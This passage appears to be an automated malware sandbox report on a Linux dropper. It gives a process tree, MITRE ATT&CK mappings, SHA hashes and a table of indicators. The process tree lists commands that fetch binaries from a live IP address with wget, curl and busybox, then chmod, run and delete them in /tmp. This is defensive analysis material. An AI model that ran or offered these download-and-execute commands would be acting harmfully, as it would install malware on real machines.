- /bin/busybox
  /bin/busybox wget http://87.120.84.230/bins/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ
  2⤵
  PID:1669
- /bin/chmod
  chmod 777 ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ
  2⤵
  - File and Directory Permissions Modification
  PID:1670
- /tmp/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ
  ./ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ
  2⤵
  - Executes dropped EXE
  PID:1671
- /bin/rm
  rm ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ
  2⤵
  PID:1672
- /usr/bin/wget
  wget http://87.120.84.230/bins/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O
  2⤵
  PID:1673
- /usr/bin/curl
  curl -O http://87.120.84.230/bins/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O
  2⤵
  - Writes file to tmp directory
  PID:1674
- /bin/busybox
  /bin/busybox wget http://87.120.84.230/bins/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O
  2⤵
  PID:1675
- /bin/chmod
  chmod 777 JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O
  2⤵
  - File and Directory Permissions Modification
  PID:1676
- /tmp/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O
  ./JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O
  2⤵
  - Executes dropped EXE
  PID:1677
- /bin/rm
  rm JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O
  2⤵
  PID:1678

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit

ioc	pid	Process
/tmp/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N	1513	wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N
/tmp/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3	1519	yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3
/tmp/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU	1525	v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU
/tmp/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O	1531	JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O
/tmp/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ	1537	ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ
/tmp/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4	1543	OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4
/tmp/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP	1549	dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP
/tmp/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U	1555	4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U
/tmp/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx	1561	M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx
/tmp/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ	1567	UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ
/tmp/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP	1573	NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP
/tmp/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf	1579	oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf
/tmp/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU	1585	NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU
/tmp/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe	1591	uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe
/tmp/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx	1597	M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx
/tmp/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4	1603	OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4
/tmp/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP	1609	dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP
/tmp/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U	1615	4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U
/tmp/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe	1621	uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe
/tmp/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ	1627	UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ
/tmp/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP	1635	NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP
/tmp/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf	1641	oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf
/tmp/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU	1647	NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU
/tmp/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU	1653	v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU
/tmp/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N	1659	wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N
/tmp/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3	1665	yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3
/tmp/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ	1671	ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ
/tmp/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O	1677	JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O